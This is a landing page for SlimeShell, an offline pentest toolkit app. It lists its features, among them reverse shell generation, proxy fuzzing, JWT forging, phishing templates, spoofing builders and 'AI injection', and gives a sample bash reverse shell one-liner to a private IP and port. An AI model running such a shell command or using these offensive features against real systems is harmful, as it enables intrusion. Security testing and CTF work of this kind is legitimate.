Every pentest tool you keep googling, in one app.

45+ tools across encoding, crypto, rev shells, proxy fuzzing, OSINT and forensics. Offline-first, client-side everything β€” no servers, no telemetry, no cloud.

tools 45+ payloads 300+ offline first Tauri 2 + React 19 MIT
$ git clone https://github.com/L-ubu/SlimeShell.git && cd SlimeShell && npm install && npm run tauri dev

01One window, whole workflow

Dashboard to scripts to terminal to payload β€” no more forty browser tabs with base64 decoders and revshell cheatsheets. It's all here, and it all works on a plane.

slimeshell
SLIMESHELL β€” toolkit overview

  Encode & Decode   52+ transforms Β· JWT debugger Β· stego Β· deobfuscator
  Generators        rev shells (20+ langs) Β· wordlists Β· listener builder
  Analysis          headers Β· IP lookup Β· forensics Β· nmap builder
  Offensive         proxy suite Β· intruder fuzzing Β· spoofing Β· AI injection
  Intel             CVE search Β· Exploit-DB Β· 300+ payloads Β· OSINT

$ revshell --lang bash --host 10.10.14.2 --port 4444

  bash -i >& /dev/tcp/10.10.14.2/4444 0>&1

  encoded variants: base64 Β· url Β· hex   βœ“ copied

02What you get

β—† Encoding pipeline

Chain 52+ transforms β€” Base64, hex, URL, Unicode, ROT13, Morse, Braille, XOR β€” and watch each step live.

β—† Proxy suite

Burp-like repeater, intruder with marker-based fuzzing, decoder chain and sequencer. No license dialog.

β—† Rev shell generator

One-liners for 20+ languages and platforms, with encoding variants and a listener command builder.

β—† Crypto toolkit

Hashing, XOR brute-force, known-plaintext attacks, frequency analysis, Vigenère and classical ciphers.

β—† Offline intel

NVD CVE search, an offline Exploit-DB browser, CVSS calculator and a searchable vuln database.

β—† Flipper Zero library

Reference guide and payload library for your favorite dolphin. Pairs nicely with flipper-portals.

03The toolbelt

A sample β€” the app ships 45+ tools across 17 pages.

CategoryHighlights
Encode/DecodeMulti-step pipelines, JWT forge (alg:none, HS256), deobfuscator
SteganographyLSB image stego, bit-plane viewer, EXIF, zero-width text, homoglyphs
OffensiveIntruder fuzzing, phishing templates, DNS/ARP/MAC spoof builders
PasswordsHash identifier, Hashcat/John command builder, rule engine
Networknmap builder, subnet calc, port reference, TCP flags
API testingHTTP client with collections, env vars and history
ReferenceCheatsheets, social-engineering guides, methodology

04Why it exists

The decisions worth knowing about, written down.

Offline-first means engagement-proof

Client networks are locked down. CTF boxes have no internet. SlimeShell doesn't care β€” everything runs client-side in a Tauri shell.

No telemetry, ever

A security tool that phones home is a contradiction. There is no analytics, no crash reporting, no account system.

Built by someone who plays CTFs

The payload library, the cheatsheets, the Flipper section β€” they exist because they were needed at 1 AM mid-challenge.